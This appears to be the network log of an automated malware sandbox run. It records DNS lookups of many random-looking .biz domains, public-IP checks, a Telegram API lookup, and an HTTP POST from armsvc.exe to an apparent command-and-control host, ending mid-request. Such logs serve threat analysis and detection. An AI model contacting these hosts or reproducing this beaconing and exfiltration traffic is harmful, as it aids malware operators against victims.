                                                                                                                                                                                                                            Dec 16, 2024 14:11:00.838861942 CET4974580192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:00.838979006 CET4974580192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:00.958836079 CET804974582.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:01.082597017 CET4974880192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:01.202821016 CET804974882.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:01.202923059 CET4974880192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:01.203083992 CET4974880192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:01.203103065 CET4974880192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:01.322900057 CET804974882.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:01.322916031 CET804974882.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:03.350689888 CET8049736172.234.222.138192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:03.352351904 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:11:03.378371954 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:11:03.498276949 CET8049736172.234.222.138192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:23.104079008 CET804974882.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:23.104306936 CET4974880192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:23.104306936 CET4974880192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:23.224268913 CET804974882.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.393264055 CET4976680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.513350964 CET804976682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.516927958 CET4976680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.516927958 CET4976680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.516927958 CET4976680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.637013912 CET804976682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.637032986 CET804976682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:33.070413113 CET8049731158.101.44.242192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:33.070494890 CET4973180192.168.2.4158.101.44.242
                                                                                                                                                                                                                            Dec 16, 2024 14:11:38.699665070 CET804973872.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:38.699753046 CET4973880192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:11:38.699970007 CET4973880192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:11:38.820806980 CET804973872.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.431463957 CET804976682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.431545973 CET4976680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.432039022 CET4976680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.434683084 CET4981680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.552932024 CET804976682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.555744886 CET804981682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.555833101 CET4981680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.556301117 CET4981680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.556301117 CET4981680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.676059961 CET804981682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:46.676079035 CET804981682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:02.371248007 CET4973180192.168.2.4158.101.44.242
                                                                                                                                                                                                                            Dec 16, 2024 14:12:02.491653919 CET8049731158.101.44.242192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:08.462932110 CET804981682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:08.462989092 CET4981680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:12:08.463572979 CET4981680192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:12:08.563811064 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:12:08.584455967 CET804981682.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:08.684274912 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:08.684341908 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.019083977 CET4986780192.168.2.447.129.31.212
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.138959885 CET804986747.129.31.212192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.139024973 CET4986780192.168.2.447.129.31.212
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.139326096 CET4986780192.168.2.447.129.31.212
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.139336109 CET4986780192.168.2.447.129.31.212
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.259021044 CET804986747.129.31.212192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.259036064 CET804986747.129.31.212192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.174906015 CET804986747.129.31.212192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.174926996 CET804986747.129.31.212192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.174985886 CET4986780192.168.2.447.129.31.212
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.181034088 CET4986780192.168.2.447.129.31.212
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.300826073 CET804986747.129.31.212192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.806859016 CET4987380192.168.2.413.251.16.150
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.926748037 CET804987313.251.16.150192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.926831007 CET4987380192.168.2.413.251.16.150
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.927006006 CET4987380192.168.2.413.251.16.150
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.927031994 CET4987380192.168.2.413.251.16.150
                                                                                                                                                                                                                            Dec 16, 2024 14:12:12.046782970 CET804987313.251.16.150192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:12.046803951 CET804987313.251.16.150192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:13.949496984 CET804987313.251.16.150192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:13.949620008 CET804987313.251.16.150192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:13.949673891 CET4987380192.168.2.413.251.16.150
                                                                                                                                                                                                                            Dec 16, 2024 14:12:13.949771881 CET4987380192.168.2.413.251.16.150
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.072128057 CET804987313.251.16.150192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.530107975 CET4988480192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.650038004 CET804988444.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.650150061 CET4988480192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.650361061 CET4988480192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.650832891 CET4988480192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.770418882 CET804988444.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.770746946 CET804988444.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:15.746413946 CET804988444.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:15.746591091 CET804988444.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:15.746629000 CET4988480192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:12:15.746673107 CET4988480192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:12:15.866425037 CET804988444.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.566016912 CET4989080192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.685925007 CET804989018.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.686014891 CET4989080192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.686177969 CET4989080192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.686197996 CET4989080192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.806143045 CET804989018.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.806166887 CET804989018.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:18.691659927 CET804989018.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:18.691859961 CET804989018.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:18.691909075 CET4989080192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:12:18.691977978 CET4989080192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:12:18.811659098 CET804989018.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.227161884 CET4989680192.168.2.4172.234.222.143
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.347076893 CET8049896172.234.222.143192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.347181082 CET4989680192.168.2.4172.234.222.143
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.347909927 CET4989680192.168.2.4172.234.222.143
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.347909927 CET4989680192.168.2.4172.234.222.143
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.467744112 CET8049896172.234.222.143192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.467825890 CET8049896172.234.222.143192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.488104105 CET8049896172.234.222.143192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.650509119 CET4989680192.168.2.4172.234.222.143
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.716762066 CET4989780192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.836788893 CET804989772.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.836862087 CET4989780192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.837055922 CET4989780192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.959336042 CET804989772.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:22.019236088 CET804989772.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:22.150408983 CET4989780192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:12:50.471704960 CET8049896172.234.222.143192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:50.471827030 CET4989680192.168.2.4172.234.222.143
                                                                                                                                                                                                                            Dec 16, 2024 14:12:50.471893072 CET4989680192.168.2.4172.234.222.143
                                                                                                                                                                                                                            Dec 16, 2024 14:12:50.592353106 CET8049896172.234.222.143192.168.2.4
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Dec 16, 2024 14:10:17.762489080 CET5767653192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.321604013 CET53576761.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.518769026 CET6051453192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.655978918 CET53605141.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.050776005 CET6113153192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.508304119 CET6394253192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.648664951 CET53639421.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.805500031 CET53611311.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.972980976 CET5835053192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.535981894 CET53583501.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.049166918 CET5324853192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.802452087 CET53532481.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.074299097 CET5510553192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.661479950 CET53551051.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.107222080 CET5580653192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.244983912 CET53558061.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.969362020 CET5368153192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.289145947 CET53536811.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:30.821801901 CET6128753192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.313303947 CET53612871.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.289138079 CET6517653192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.502809048 CET53651761.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.503647089 CET5331353192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.076901913 CET53533131.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.256336927 CET5728053192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.482505083 CET53572801.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.492661953 CET5721453192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.724349976 CET53572141.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.725570917 CET5393353192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:38.599750996 CET53539331.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:52.840471983 CET5692353192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:10:52.985663891 CET53569231.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:23.149178982 CET5949853192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.069719076 CET53594981.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:08.464411974 CET6136553192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.010910988 CET53613651.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.194032907 CET5473153192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.791445017 CET53547311.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:13.950501919 CET6119553192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.520155907 CET53611951.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:15.747282028 CET5532453192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.559056044 CET53553241.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:18.692641973 CET6387853192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.195611954 CET53638781.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.490696907 CET5109653192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.714555025 CET53510961.1.1.1192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:12:22.021290064 CET5314253192.168.2.41.1.1.1
                                                                                                                                                                                                                            Dec 16, 2024 14:12:22.357326984 CET53531421.1.1.1192.168.2.4
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Dec 16, 2024 14:10:17.762489080 CET192.168.2.41.1.1.10x38cbStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.518769026 CET192.168.2.41.1.1.10x7f40Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.050776005 CET192.168.2.41.1.1.10xac49Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.508304119 CET192.168.2.41.1.1.10xaa7dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.972980976 CET192.168.2.41.1.1.10x405aStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.049166918 CET192.168.2.41.1.1.10xb7eaStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.074299097 CET192.168.2.41.1.1.10xdfbcStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.107222080 CET192.168.2.41.1.1.10xbe46Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.969362020 CET192.168.2.41.1.1.10x2641Standard query (0)ww99.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:30.821801901 CET192.168.2.41.1.1.10xcb87Standard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.289138079 CET192.168.2.41.1.1.10x78a4Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.503647089 CET192.168.2.41.1.1.10x7f7fStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.256336927 CET192.168.2.41.1.1.10x568cStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.492661953 CET192.168.2.41.1.1.10x7f33Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.725570917 CET192.168.2.41.1.1.10xafeStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:52.840471983 CET192.168.2.41.1.1.10x9873Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:11:23.149178982 CET192.168.2.41.1.1.10xe798Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:08.464411974 CET192.168.2.41.1.1.10x85b2Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.194032907 CET192.168.2.41.1.1.10x1176Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:13.950501919 CET192.168.2.41.1.1.10x60efStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:15.747282028 CET192.168.2.41.1.1.10xd99Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:18.692641973 CET192.168.2.41.1.1.10xbb5Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.490696907 CET192.168.2.41.1.1.10xf882Standard query (0)ww99.fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:22.021290064 CET192.168.2.41.1.1.10x9e9eStandard query (0)ww7.fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.321604013 CET1.1.1.1192.168.2.40x38cbNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.655978918 CET1.1.1.1192.168.2.40x7f40No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.655978918 CET1.1.1.1192.168.2.40x7f40No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.655978918 CET1.1.1.1192.168.2.40x7f40No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.655978918 CET1.1.1.1192.168.2.40x7f40No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.655978918 CET1.1.1.1192.168.2.40x7f40No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.655978918 CET1.1.1.1192.168.2.40x7f40No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.648664951 CET1.1.1.1192.168.2.40xaa7dNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.648664951 CET1.1.1.1192.168.2.40xaa7dNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.805500031 CET1.1.1.1192.168.2.40xac49No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.535981894 CET1.1.1.1192.168.2.40x405aNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.802452087 CET1.1.1.1192.168.2.40xb7eaNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.661479950 CET1.1.1.1192.168.2.40xdfbcNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.661479950 CET1.1.1.1192.168.2.40xdfbcNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.244983912 CET1.1.1.1192.168.2.40xbe46No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.289145947 CET1.1.1.1192.168.2.40x2641No error (0)ww99.przvgke.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.313303947 CET1.1.1.1192.168.2.40xcb87No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.313303947 CET1.1.1.1192.168.2.40xcb87No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.313303947 CET1.1.1.1192.168.2.40xcb87No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.502809048 CET1.1.1.1192.168.2.40x78a4Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.076901913 CET1.1.1.1192.168.2.40x7f7fNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.482505083 CET1.1.1.1192.168.2.40x568cName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.724349976 CET1.1.1.1192.168.2.40x7f33Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:38.599750996 CET1.1.1.1192.168.2.40xafeNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:10:52.985663891 CET1.1.1.1192.168.2.40x9873No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:11:24.069719076 CET1.1.1.1192.168.2.40xe798No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:09.010910988 CET1.1.1.1192.168.2.40x85b2No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:11.791445017 CET1.1.1.1192.168.2.40x1176No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:14.520155907 CET1.1.1.1192.168.2.40x60efNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:16.559056044 CET1.1.1.1192.168.2.40xd99No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.195611954 CET1.1.1.1192.168.2.40xbb5No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:19.195611954 CET1.1.1.1192.168.2.40xbb5No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:20.714555025 CET1.1.1.1192.168.2.40xf882No error (0)ww99.fwiwk.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:22.357326984 CET1.1.1.1192.168.2.40x9e9eNo error (0)ww7.fwiwk.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Dec 16, 2024 14:12:22.357326984 CET1.1.1.1192.168.2.40x9e9eNo error (0)76899.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            • reallyfreegeoip.org
                                                                                                                                                                                                                            • api.telegram.org
                                                                                                                                                                                                                            • pywolwnvd.biz
                                                                                                                                                                                                                            • checkip.dyndns.org
                                                                                                                                                                                                                            • ssbzmoy.biz
                                                                                                                                                                                                                            • cvgrf.biz
                                                                                                                                                                                                                            • npukfztj.biz
                                                                                                                                                                                                                            • przvgke.biz
                                                                                                                                                                                                                            • ww99.przvgke.biz
                                                                                                                                                                                                                            • ww12.przvgke.biz
                                                                                                                                                                                                                            • knjghuig.biz
                                                                                                                                                                                                                            • lpuegx.biz
                                                                                                                                                                                                                            • vjaxhpbji.biz
                                                                                                                                                                                                                            • xlfhhhm.biz
                                                                                                                                                                                                                            • ifsaia.biz
                                                                                                                                                                                                                            • saytjshyf.biz
                                                                                                                                                                                                                            • vcddkls.biz
                                                                                                                                                                                                                            • fwiwk.biz
                                                                                                                                                                                                                            • ww99.fwiwk.biz
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.44973054.244.188.177807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.760102987 CET350OUTPOST /vayts HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
